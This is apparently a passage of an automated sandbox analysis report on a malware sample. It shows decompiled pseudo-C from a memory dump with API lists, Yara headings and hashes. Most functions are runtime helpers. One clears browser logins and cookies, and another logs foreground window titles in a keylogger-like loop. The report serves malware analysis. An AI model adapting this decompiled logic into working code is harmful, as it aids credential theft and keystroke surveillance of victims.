                                                                                                																						 *(_t432 + 8) = _v748;
                                                                                                																						goto L84;
                                                                                                																					}
                                                                                                																					goto L85;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			goto L85;
                                                                                                																		}
                                                                                                																		goto L130;
                                                                                                																	}
                                                                                                																	asm("sbb eax, eax");
                                                                                                																	_t282 = _t281 | 0x00000001;
                                                                                                																	__eflags = _t282;
                                                                                                																	goto L93;
                                                                                                																} else {
                                                                                                																	L84:
                                                                                                																	__eflags = 0;
                                                                                                																	L85:
                                                                                                																	__eflags = _v16 ^ _t465;
                                                                                                																	return E00430A5B(_v16 ^ _t465);
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t330 = _t447 + _t447;
                                                                                                																__eflags = _t330 - 0x106;
                                                                                                																if(_t330 >= 0x106) {
                                                                                                																	E00430B8F();
                                                                                                																	goto L82;
                                                                                                																} else {
                                                                                                																	 *((short*)(_t463 + _t330 - 0x10c)) = 0;
                                                                                                																	_t332 =  &_v276;
                                                                                                																	_push(_t332);
                                                                                                																	_push(_v460);
                                                                                                																	_push(_t428);
                                                                                                																	L83();
                                                                                                																	_t472 = _t475 + 0xc;
                                                                                                																	__eflags = _t332;
                                                                                                																	_t268 = _v452;
                                                                                                																	if(_t332 != 0) {
                                                                                                																		_t268 = _t268 + 1;
                                                                                                																		_v452 = _t268;
                                                                                                																	}
                                                                                                																	L54:
                                                                                                																	_t444 = _t359 + _t447 * 2;
                                                                                                																	_t370 = 0;
                                                                                                																	__eflags =  *_t444;
                                                                                                																	if( *_t444 == 0) {
                                                                                                																		L56:
                                                                                                																		__eflags = _t268;
                                                                                                																		L77:
                                                                                                																		if(__eflags != 0) {
                                                                                                																			goto L79;
                                                                                                																		} else {
                                                                                                																		}
                                                                                                																		goto L80;
                                                                                                																	} else {
                                                                                                																		_t444 = _t444 + 2;
                                                                                                																		__eflags =  *_t444;
                                                                                                																		if( *_t444 != 0) {
                                                                                                																			continue;
                                                                                                																		} else {
                                                                                                																			goto L56;
                                                                                                																		}
                                                                                                																	}
                                                                                                																}
                                                                                                															}
                                                                                                														}
                                                                                                													} else {
                                                                                                														_t333 = 0x3b;
                                                                                                														__eflags =  *_t359 - _t333;
                                                                                                														if( *_t359 != _t333) {
                                                                                                															break;
                                                                                                														} else {
                                                                                                															goto L48;
                                                                                                														}
                                                                                                													}
                                                                                                												}
                                                                                                											}
                                                                                                											goto L130;
                                                                                                										}
                                                                                                										goto L80;
                                                                                                									}
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                					} else {
                                                                                                						__eflags = _t444;
                                                                                                						if(_t444 != 0) {
                                                                                                							_push(_t444);
                                                                                                							_push(_t249);
                                                                                                							_push(_t428);
                                                                                                							L83();
                                                                                                						}
                                                                                                						L80:
                                                                                                						__eflags = _v12 ^ _t463;
                                                                                                						return E00430A5B(_v12 ^ _t463);
                                                                                                					}
                                                                                                				}
                                                                                                				L130:
                                                                                                			}

                                                                                                0x0043f9ea
                                                                                                0x0043f9f0
                                                                                                0x0043f9f2
                                                                                                0x0043fa17
                                                                                                0x0043fa21
                                                                                                0x0043fa27
                                                                                                0x0043fa29
                                                                                                0x0043fa2f
                                                                                                0x0043fa31
                                                                                                0x0043fc84
                                                                                                0x0043fc85
                                                                                                0x00000000
                                                                                                0x0043fa37
                                                                                                0x0043fa37
                                                                                                0x0043fa3b
                                                                                                0x0043fba2
                                                                                                0x0043fba2
                                                                                                0x0043fbb9
                                                                                                0x0043fbbe
                                                                                                0x0043fbc1
                                                                                                0x0043fbc3
                                                                                                0x0043fbc9
                                                                                                0x0043fbc9
                                                                                                0x0043fbcb
                                                                                                0x0043fbcb
                                                                                                0x0043fbce
                                                                                                0x0043fbd0
                                                                                                0x0043fbd6
                                                                                                0x0043fbd6
                                                                                                0x0043fbd8
                                                                                                0x0043fc5f
                                                                                                0x0043fc5f
                                                                                                0x0043fbde
                                                                                                0x0043fbde
                                                                                                0x0043fbe0
                                                                                                0x0043fbe6
                                                                                                0x0043fbe9
                                                                                                0x0043fbec
                                                                                                0x0043fbf2
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fbf4
                                                                                                0x0043fbf8
                                                                                                0x0043fc21
                                                                                                0x0043fc21
                                                                                                0x0043fc23
                                                                                                0x0043fbfa
                                                                                                0x0043fbfa
                                                                                                0x0043fbfe
                                                                                                0x0043fc02
                                                                                                0x0043fc09
                                                                                                0x0043fc0f
                                                                                                0x00000000
                                                                                                0x0043fc11
                                                                                                0x0043fc11
                                                                                                0x0043fc14
                                                                                                0x0043fc17
                                                                                                0x0043fc1f
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fc1f
                                                                                                0x0043fc0f
                                                                                                0x0043fc2e
                                                                                                0x0043fc2e
                                                                                                0x0043fc30
                                                                                                0x0043fc5e
                                                                                                0x0043fc5e
                                                                                                0x00000000
                                                                                                0x0043fc32
                                                                                                0x0043fc32
                                                                                                0x0043fc38
                                                                                                0x0043fc39
                                                                                                0x0043fc3a
                                                                                                0x0043fc3b
                                                                                                0x0043fc40
                                                                                                0x0043fc46
                                                                                                0x0043fc49
                                                                                                0x0043fc4b
                                                                                                0x0043fc52
                                                                                                0x0043fc54
                                                                                                0x0043fc56
                                                                                                0x0043fc4d
                                                                                                0x0043fc4d
                                                                                                0x0043fc4e
                                                                                                0x00000000
                                                                                                0x0043fc4e
                                                                                                0x0043fc4b
                                                                                                0x00000000
                                                                                                0x0043fc30
                                                                                                0x0043fc27
                                                                                                0x0043fc29
                                                                                                0x0043fc2c
                                                                                                0x0043fc2c
                                                                                                0x00000000
                                                                                                0x0043fc2c
                                                                                                0x0043fc65
                                                                                                0x0043fc65
                                                                                                0x0043fc66
                                                                                                0x0043fc69
                                                                                                0x0043fc6f
                                                                                                0x0043fc6f
                                                                                                0x0043fc78
                                                                                                0x0043fc7a
                                                                                                0x00000000
                                                                                                0x0043fc7c
                                                                                                0x0043fc7c
                                                                                                0x00000000
                                                                                                0x0043fc7c
                                                                                                0x0043fc7a
                                                                                                0x00000000
                                                                                                0x0043fa41
                                                                                                0x0043fa41
                                                                                                0x0043fa46
                                                                                                0x00000000
                                                                                                0x0043fa4c
                                                                                                0x0043fa4c
                                                                                                0x0043fa51
                                                                                                0x00000000
                                                                                                0x0043fa57
                                                                                                0x0043fa57
                                                                                                0x0043fa5d
                                                                                                0x0043fa62
                                                                                                0x0043fa64
                                                                                                0x0043fa6b
                                                                                                0x0043fa6c
                                                                                                0x0043fa6e
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fa74
                                                                                                0x0043fa74
                                                                                                0x0043fa78
                                                                                                0x0043fa7e
                                                                                                0x00000000
                                                                                                0x0043fa84
                                                                                                0x0043fa86
                                                                                                0x0043fa87
                                                                                                0x0043fa8a
                                                                                                0x00000000
                                                                                                0x0043fa90
                                                                                                0x0043fa90
                                                                                                0x0043fa96
                                                                                                0x0043fa9b
                                                                                                0x0043faa5
                                                                                                0x0043faa9
                                                                                                0x0043faae
                                                                                                0x0043fab1
                                                                                                0x0043fab3
                                                                                                0x00000000
                                                                                                0x0043fab5
                                                                                                0x0043fab5
                                                                                                0x0043fab7
                                                                                                0x0043faba
                                                                                                0x0043faba
                                                                                                0x0043fabd
                                                                                                0x0043fac0
                                                                                                0x0043fac0
                                                                                                0x0043facb
                                                                                                0x0043facd
                                                                                                0x0043facf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043facf
                                                                                                0x00000000
                                                                                                0x0043fad1
                                                                                                0x0043fad1
                                                                                                0x0043fad7
                                                                                                0x0043fada
                                                                                                0x0043fada
                                                                                                0x0043fae8
                                                                                                0x0043faf1
                                                                                                0x0043faf6
                                                                                                0x0043fafc
                                                                                                0x0043faff
                                                                                                0x0043fb00
                                                                                                0x0043fb02
                                                                                                0x0043fb10
                                                                                                0x0043fb10
                                                                                                0x0043fb17
                                                                                                0x0043fb78
                                                                                                0x00000000
                                                                                                0x0043fb19
                                                                                                0x0043fb19
                                                                                                0x0043fb27
                                                                                                0x0043fb2c
                                                                                                0x0043fb2f
                                                                                                0x0043fb31
                                                                                                0x0043fca1
                                                                                                0x0043fca3
                                                                                                0x0043fca4
                                                                                                0x0043fca5
                                                                                                0x0043fca6
                                                                                                0x0043fca7
                                                                                                0x0043fca8
                                                                                                0x0043fcad
                                                                                                0x0043fcb0
                                                                                                0x0043fcb1
                                                                                                0x0043fcb9
                                                                                                0x0043fcc0
                                                                                                0x0043fcc3
                                                                                                0x0043fcc4
                                                                                                0x0043fcc7
                                                                                                0x0043fccb
                                                                                                0x0043fccc
                                                                                                0x0043fccf
                                                                                                0x0043fcdf
                                                                                                0x0043fceb
                                                                                                0x0043fd02
                                                                                                0x0043fd07
                                                                                                0x0043fd0a
                                                                                                0x0043fd0c
                                                                                                0x0043fd21
                                                                                                0x0043fd24
                                                                                                0x0043fd24
                                                                                                0x0043fd27
                                                                                                0x0043fd2d
                                                                                                0x0043fd36
                                                                                                0x0043fd38
                                                                                                0x0043fd3b
                                                                                                0x0043fd42
                                                                                                0x0043fd45
                                                                                                0x0043fd4b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fd4d
                                                                                                0x0043fd51
                                                                                                0x0043fd7a
                                                                                                0x0043fd7a
                                                                                                0x0043fd53
                                                                                                0x0043fd53
                                                                                                0x0043fd57
                                                                                                0x0043fd5b
                                                                                                0x0043fd62
                                                                                                0x0043fd68
                                                                                                0x00000000
                                                                                                0x0043fd6a
                                                                                                0x0043fd6a
                                                                                                0x0043fd6d
                                                                                                0x0043fd70
                                                                                                0x0043fd78
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0043fd78
                                                                                                0x0043fd68
                                                                                                0x0043fd87
                                                                                                0x0043fd87
                                                                                                0x0043fd89
                                                                                                0x0043fd8f
                                                                                                0x0043fd95
                                                                                                0x0043fd98
                                                                                                0x0043fd98
                                                                                                0x0043fd9b
                                                                                                0x0043fd9e
                                                                                                0x0043fd9e
                                                                                                0x0043fdae
                                                                                                0x0043fdbc
                                                                                                0x0043fdc1
                                                                                                0x0043fdc8
                                                                                                0x0043fdca

                                                                                                APIs
                                                                                                  • Part of subcall function 00440C6C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0042FF99,?,?,00401696,?,?,?,?,?), ref: 00440C9E
                                                                                                • _free.LIBCMT ref: 0043F93B
                                                                                                • _free.LIBCMT ref: 0043F952
                                                                                                • _free.LIBCMT ref: 0043F971
                                                                                                • _free.LIBCMT ref: 0043F98C
                                                                                                • _free.LIBCMT ref: 0043F9A3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$AllocateHeap
                                                                                                • String ID:
                                                                                                • API String ID: 3033488037-0
                                                                                                • Opcode ID: 8fee0f539c6b4ec05e4bde5980b4adcfdb9fc21a50c2bde062df2c03e1249692
                                                                                                • Instruction ID: 6aaaa5bec138e3d3e81223152904448ce55a974662f590fac9bc0c466bee7041
                                                                                                • Opcode Fuzzy Hash: 8fee0f539c6b4ec05e4bde5980b4adcfdb9fc21a50c2bde062df2c03e1249692
                                                                                                • Instruction Fuzzy Hash: 9B51D471E00304AFEB24EF6AC841B6A77F4EF58724F10556EE849DB250EB39ED058B48
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E0043E92E(signed int* __ecx, signed int __edx) {
                                                                                                				signed int _v8;
                                                                                                				intOrPtr* _v12;
                                                                                                				signed int _v16;
                                                                                                				signed int _t28;
                                                                                                				signed int _t29;
                                                                                                				intOrPtr _t33;
                                                                                                				signed int _t37;
                                                                                                				signed int _t38;
                                                                                                				signed int _t40;
                                                                                                				void* _t50;
                                                                                                				signed int _t56;
                                                                                                				intOrPtr* _t57;
                                                                                                				signed int _t68;
                                                                                                				signed int _t71;
                                                                                                				signed int _t72;
                                                                                                				signed int _t74;
                                                                                                				signed int _t75;
                                                                                                				signed int _t78;
                                                                                                				signed int _t80;
                                                                                                				signed int* _t81;
                                                                                                				signed int _t85;
                                                                                                				void* _t86;
                                                                                                
                                                                                                				_t72 = __edx;
                                                                                                				_v12 = __ecx;
                                                                                                				_t28 =  *__ecx;
                                                                                                				_t81 =  *_t28;
                                                                                                				if(_t81 != 0) {
                                                                                                					_t29 =  *0x46c00c; // 0x4cc22724
                                                                                                					_t56 =  *_t81 ^ _t29;
                                                                                                					_t78 = _t81[1] ^ _t29;
                                                                                                					_t83 = _t81[2] ^ _t29;
                                                                                                					asm("ror edi, cl");
                                                                                                					asm("ror esi, cl");
                                                                                                					asm("ror ebx, cl");
                                                                                                					if(_t78 != _t83) {
                                                                                                						L14:
                                                                                                						 *_t78 = E0043EC2D( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
                                                                                                						_t33 = E0042FDF1(_t56);
                                                                                                						_t57 = _v12;
                                                                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
                                                                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = E0042FDF1(_t78 + 4);
                                                                                                						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = E0042FDF1(_t83);
                                                                                                						_t37 = 0;
                                                                                                						L15:
                                                                                                						return _t37;
                                                                                                					}
                                                                                                					_t38 = 0x200;
                                                                                                					_t85 = _t83 - _t56 >> 2;
                                                                                                					if(_t85 <= 0x200) {
                                                                                                						_t38 = _t85;
                                                                                                					}
                                                                                                					_t80 = _t38 + _t85;
                                                                                                					if(_t80 == 0) {
                                                                                                						_t80 = 0x20;
                                                                                                					}
                                                                                                					if(_t80 < _t85) {
                                                                                                						L9:
                                                                                                						_push(4);
                                                                                                						_t80 = _t85 + 4;
                                                                                                						_push(_t80);
                                                                                                						_v8 = E00448FA5(_t56);
                                                                                                						_t40 = E004414D5(0);
                                                                                                						_t68 = _v8;
                                                                                                						_t86 = _t86 + 0x10;
                                                                                                						if(_t68 != 0) {
                                                                                                							goto L11;
                                                                                                						}
                                                                                                						_t37 = _t40 | 0xffffffff;
                                                                                                						goto L15;
                                                                                                					} else {
                                                                                                						_push(4);
                                                                                                						_push(_t80);
                                                                                                						_v8 = E00448FA5(_t56);
                                                                                                						E004414D5(0);
                                                                                                						_t68 = _v8;
                                                                                                						_t86 = _t86 + 0x10;
                                                                                                						if(_t68 != 0) {
                                                                                                							L11:
                                                                                                							_t56 = _t68;
                                                                                                							_v8 = _t68 + _t85 * 4;
                                                                                                							_t83 = _t68 + _t80 * 4;
                                                                                                							_t78 = _v8;
                                                                                                							_push(0x20);
                                                                                                							asm("ror eax, cl");
                                                                                                							_t71 = _t78;
                                                                                                							_v16 = 0 ^  *0x46c00c;
                                                                                                							asm("sbb edx, edx");
                                                                                                							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
                                                                                                							_v8 = _t74;
                                                                                                							if(_t74 == 0) {
                                                                                                								goto L14;
                                                                                                							}
                                                                                                							_t75 = _v16;
                                                                                                							_t50 = 0;
                                                                                                							do {
                                                                                                								_t50 = _t50 + 1;
                                                                                                								 *_t71 = _t75;
                                                                                                								_t71 = _t71 + 4;
                                                                                                							} while (_t50 != _v8);
                                                                                                							goto L14;
                                                                                                						}
                                                                                                						goto L9;
                                                                                                					}
                                                                                                				}
                                                                                                				return _t28 | 0xffffffff;
                                                                                                			}


























                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free
                                                                                                • String ID:
                                                                                                • API String ID: 269201875-0
                                                                                                • Opcode ID: b0c3631190825fb247436dd3047d6e30e75d60bdc86dd48adbe74bfa38bba167
                                                                                                • Instruction ID: 18cd1fd9d550af13f9bd9250775877e2e2697c8ddc90931c32446df81c8b808c
                                                                                                • Opcode Fuzzy Hash: b0c3631190825fb247436dd3047d6e30e75d60bdc86dd48adbe74bfa38bba167
                                                                                                • Instruction Fuzzy Hash: BC41E472B01204DFDB10DF79C880A6EB7B6EF88314F1545AEE515EB391DA35AD01CB85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 81%
                                                                                                			E0044A5FC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                                                				signed int _v8;
                                                                                                				int _v12;
                                                                                                				char _v16;
                                                                                                				intOrPtr _v24;
                                                                                                				char _v28;
                                                                                                				void* _v40;
                                                                                                				signed int _t34;
                                                                                                				signed int _t40;
                                                                                                				int _t46;
                                                                                                				int _t53;
                                                                                                				void* _t55;
                                                                                                				int _t57;
                                                                                                				signed int _t63;
                                                                                                				int _t67;
                                                                                                				short* _t69;
                                                                                                				signed int _t70;
                                                                                                				short* _t71;
                                                                                                
                                                                                                				_t34 =  *0x46c00c; // 0x4cc22724
                                                                                                				_v8 = _t34 ^ _t70;
                                                                                                				E00436267(__ebx,  &_v28, __edx, _a4);
                                                                                                				_t57 = _a24;
                                                                                                				if(_t57 == 0) {
                                                                                                					_t53 =  *(_v24 + 8);
                                                                                                					_t57 = _t53;
                                                                                                					_a24 = _t53;
                                                                                                				}
                                                                                                				_t67 = 0;
                                                                                                				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
                                                                                                				_v12 = _t40;
                                                                                                				if(_t40 == 0) {
                                                                                                					L15:
                                                                                                					if(_v16 != 0) {
                                                                                                						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
                                                                                                					}
                                                                                                					return E00430A5B(_v8 ^ _t70);
                                                                                                				}
                                                                                                				_t55 = _t40 + _t40;
                                                                                                				asm("sbb eax, eax");
                                                                                                				if((_t55 + 0x00000008 & _t40) == 0) {
                                                                                                					_t69 = 0;
                                                                                                					L11:
                                                                                                					if(_t69 != 0) {
                                                                                                						E00432D80(_t67, _t69, _t67, _t55);
                                                                                                						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
                                                                                                						if(_t46 != 0) {
                                                                                                							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
                                                                                                						}
                                                                                                					}
                                                                                                					L14:
                                                                                                					E004318FD(_t69);
                                                                                                					goto L15;
                                                                                                				}
                                                                                                				asm("sbb eax, eax");
                                                                                                				_t48 = _t40 & _t55 + 0x00000008;
                                                                                                				_t63 = _t55 + 8;
                                                                                                				if((_t40 & _t55 + 0x00000008) > 0x400) {
                                                                                                					asm("sbb eax, eax");
                                                                                                					_t69 = E00440C6C(_t63, _t48 & _t63);
                                                                                                					if(_t69 == 0) {
                                                                                                						goto L14;
                                                                                                					}
                                                                                                					 *_t69 = 0xdddd;
                                                                                                					L9:
                                                                                                					_t69 =  &(_t69[4]);
                                                                                                					goto L11;
                                                                                                				}
                                                                                                				asm("sbb eax, eax");
                                                                                                				E004519B0();
                                                                                                				_t69 = _t71;
                                                                                                				if(_t69 == 0) {
                                                                                                					goto L14;
                                                                                                				}
                                                                                                				 *_t69 = 0xcccc;
                                                                                                				goto L9;
                                                                                                			}





















                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00437B61,?,00000000,?,00000001,?,?,00000001,00437B61,?), ref: 0044A649
                                                                                                • __alloca_probe_16.LIBCMT ref: 0044A681
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0044A6D2
                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,004368BC,?), ref: 0044A6E4
                                                                                                • __freea.LIBCMT ref: 0044A6ED
                                                                                                  • Part of subcall function 00440C6C: RtlAllocateHeap.NTDLL(00000000,?,?,?,0042FF99,?,?,00401696,?,?,?,?,?), ref: 00440C9E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                • String ID:
                                                                                                • API String ID: 313313983-0
                                                                                                • Opcode ID: 7e79db97571175ca7111f874d4c38dfa999d1bf06c5dd09b332ed8df72992552
                                                                                                • Instruction ID: e3019f22f7cfd39f5529fa93d9ebec7d24df21dc7c365d8cb9bf80db1de2f609
                                                                                                • Opcode Fuzzy Hash: 7e79db97571175ca7111f874d4c38dfa999d1bf06c5dd09b332ed8df72992552
                                                                                                • Instruction Fuzzy Hash: 32311472A0021AABEF249F65DC85DAF7BA4EF40314F09416AFC04DB250E739CC60CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 83%
                                                                                                			E0040A558(void* __edi) {
                                                                                                				char _v5;
                                                                                                				char _v6;
                                                                                                				char _v7;
                                                                                                				void* __ebx;
                                                                                                				void* __ecx;
                                                                                                				void* __ebp;
                                                                                                				intOrPtr _t18;
                                                                                                				void* _t36;
                                                                                                				intOrPtr _t40;
                                                                                                				char _t50;
                                                                                                				void* _t52;
                                                                                                				signed int _t53;
                                                                                                				signed int _t54;
                                                                                                				void* _t55;
                                                                                                
                                                                                                				_t52 = __edi;
                                                                                                				_t54 = _t53 & 0xfffffff8;
                                                                                                				 *0x46daed = 1;
                                                                                                				Sleep( *0x46dae8);
                                                                                                				_v7 = 0;
                                                                                                				_t36 = 0;
                                                                                                				_v6 = 0;
                                                                                                				_v5 = 0;
                                                                                                				goto L1;
                                                                                                				do {
                                                                                                					do {
                                                                                                						L1:
                                                                                                						_t59 = _t36;
                                                                                                						if(_t36 == 0) {
                                                                                                							L2:
                                                                                                							_t36 = E0040A43E(_t59);
                                                                                                						}
                                                                                                						_t60 = _t36;
                                                                                                						if(_t36 == 0) {
                                                                                                							_t36 = E0040A262(_t52, _t60);
                                                                                                						}
                                                                                                						_t61 = _v6;
                                                                                                						if(_v6 == 0) {
                                                                                                							_v6 = E0040A047(_t36, _t52, _t61);
                                                                                                						}
                                                                                                						_t62 = _v7;
                                                                                                						if(_v7 == 0) {
                                                                                                							_v7 = E00409FB8(_t52, _t62);
                                                                                                						}
                                                                                                						_t50 = _v5;
                                                                                                						_t63 = _t50;
                                                                                                						if(_t50 == 0) {
                                                                                                							_t50 = E00409F29(_t52, _t63);
                                                                                                							_v5 = _t50;
                                                                                                						}
                                                                                                						if(_t36 == 0 || _t36 == 0) {
                                                                                                							L16:
                                                                                                							Sleep(0x1388);
                                                                                                							_t18 = _v7;
                                                                                                							_t40 = _v6;
                                                                                                							_t50 = _v5;
                                                                                                						} else {
                                                                                                							_t18 = _v7;
                                                                                                							if(_t18 == 0 || _t50 == 0) {
                                                                                                								goto L16;
                                                                                                							} else {
                                                                                                								_t40 = _v6;
                                                                                                								if(_t40 == 0) {
                                                                                                									goto L16;
                                                                                                								}
                                                                                                							}
                                                                                                						}
                                                                                                						if(_t36 == 0) {
                                                                                                							goto L2;
                                                                                                						}
                                                                                                					} while (_t36 == 0 || _t18 == 0 || _t50 == 0);
                                                                                                					_t73 = _t40;
                                                                                                				} while (_t40 == 0);
                                                                                                				_t55 = _t54 - 0x18;
                                                                                                				E00402076(_t36, _t55, "\n[Cleared browsers logins and cookies.]\n");
                                                                                                				E0040A724(_t36, _t50, _t73);
                                                                                                				E00402076(_t36, _t55, "Cleared browsers logins and cookies.");
                                                                                                				_t56 = _t55 - 0x18;
                                                                                                				E00402076(_t36, _t55 - 0x18, "i");
                                                                                                				E00417670(_t36, _t52);
                                                                                                				E00402076(_t36, _t56 + 0x18, 0x460734);
                                                                                                				_push(0xaf);
                                                                                                				E00404BB7(_t36, 0x46e848, _t50, _t73);
                                                                                                				if( *0x46daec != 0) {
                                                                                                					E00410BDF(0x46e5a8, E00401F87(0x46e5a8), "FR", 1);
                                                                                                				}
                                                                                                				 *0x46daed = 0;
                                                                                                				return 0;
                                                                                                			}

                                                                                                APIs
                                                                                                Strings
                                                                                                • Cleared browsers logins and cookies., xrefs: 0040A641
                                                                                                • [Cleared browsers logins and cookies.], xrefs: 0040A630
                                                                                                • HF, xrefs: 0040A673
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Sleep
                                                                                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$HF
                                                                                                • API String ID: 3472027048-3237332583
                                                                                                • Opcode ID: 21acf838c3ef3d37e89a7cb7b37da1cb45ed835ec19164bd4333aee075db73ed
                                                                                                • Instruction ID: 1159f6137ea5fcd9a7ec24e65668836fe1ed30cbca5fe25e035a3b6fd4e0bff1
                                                                                                • Opcode Fuzzy Hash: 21acf838c3ef3d37e89a7cb7b37da1cb45ed835ec19164bd4333aee075db73ed
                                                                                                • Instruction Fuzzy Hash: D031A00464C38169DA1167B558167AB7BD11A93758F0C84BFB8C43B3C3E9BA4818D36F
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 89%
                                                                                                			E00408A87() {
                                                                                                				char _v2004;
                                                                                                				char _v2012;
                                                                                                				char _v2028;
                                                                                                				void* _v2036;
                                                                                                				char _v2056;
                                                                                                				void* _v2060;
                                                                                                				char _v2080;
                                                                                                				void* _v2084;
                                                                                                				void* _t15;
                                                                                                				signed int _t17;
                                                                                                				void* _t30;
                                                                                                				void* _t32;
                                                                                                				void* _t34;
                                                                                                				void* _t35;
                                                                                                				void* _t59;
                                                                                                				void* _t61;
                                                                                                				signed int _t62;
                                                                                                				signed int _t63;
                                                                                                				void* _t64;
                                                                                                				void* _t65;
                                                                                                				void* _t66;
                                                                                                				void* _t67;
                                                                                                				void* _t68;
                                                                                                
                                                                                                				_t63 = _t62 & 0xfffffff8;
                                                                                                				_t69 = _t63;
                                                                                                				_t64 = _t63 - 0x81c;
                                                                                                				_push(_t34);
                                                                                                				_t59 = Sleep;
                                                                                                				_t61 = _t35;
                                                                                                				while(1) {
                                                                                                					E00432D80(_t59,  &_v2004, 0, 0x7d0);
                                                                                                					_t65 = _t64 + 0xc;
                                                                                                					while(1) {
                                                                                                						_t15 = E00401F87(E00401E3B(0x46e3a4, _t56, _t69, 0x2a));
                                                                                                						_t66 = _t65 - 0x18;
                                                                                                						E00404260(_t34, _t66, _t15);
                                                                                                						_t17 = E004184AF( &_v2012, _t56);
                                                                                                						_t65 = _t66 + 0x18;
                                                                                                						_t69 = _t17;
                                                                                                						if(_t17 != 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						Sleep(0x1f4);
                                                                                                					}
                                                                                                					_t56 = E004043E6(_t34,  &_v2056, L"\r\n[ ", __eflags, E00404260(_t34,  &_v2028,  &_v2004));
                                                                                                					E00401EEC(_t61 + 4, _t20, _t61, E00403098(_t34,  &_v2080, _t20, _t59, __eflags, L" ]\r\n"));
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                					E00401EE2();
                                                                                                					_t67 = _t65 - 0x18;
                                                                                                					E004074B3(_t34, _t67, _t56, __eflags, _t61 + 0x60);
                                                                                                					E00408778(_t61);
                                                                                                					while(1) {
                                                                                                						_t30 = E00401F87(E00401E3B(0x46e3a4, _t56, __eflags, 0x2a));
                                                                                                						_t68 = _t67 - 0x18;
                                                                                                						E00404260(_t34, _t68, _t30);
                                                                                                						_t32 = E004184AF(0, _t56);
                                                                                                						_t64 = _t68 + 0x18;
                                                                                                						__eflags = _t32;
                                                                                                						if(__eflags == 0) {
                                                                                                							break;
                                                                                                						}
                                                                                                						Sleep(0x64);
                                                                                                					}
                                                                                                					E004095C0(_t34, _t61);
                                                                                                				}
                                                                                                			}

                                                                                                APIs
                                                                                                  • Part of subcall function 004184AF: GetForegroundWindow.USER32(73B76490,?), ref: 004184BF
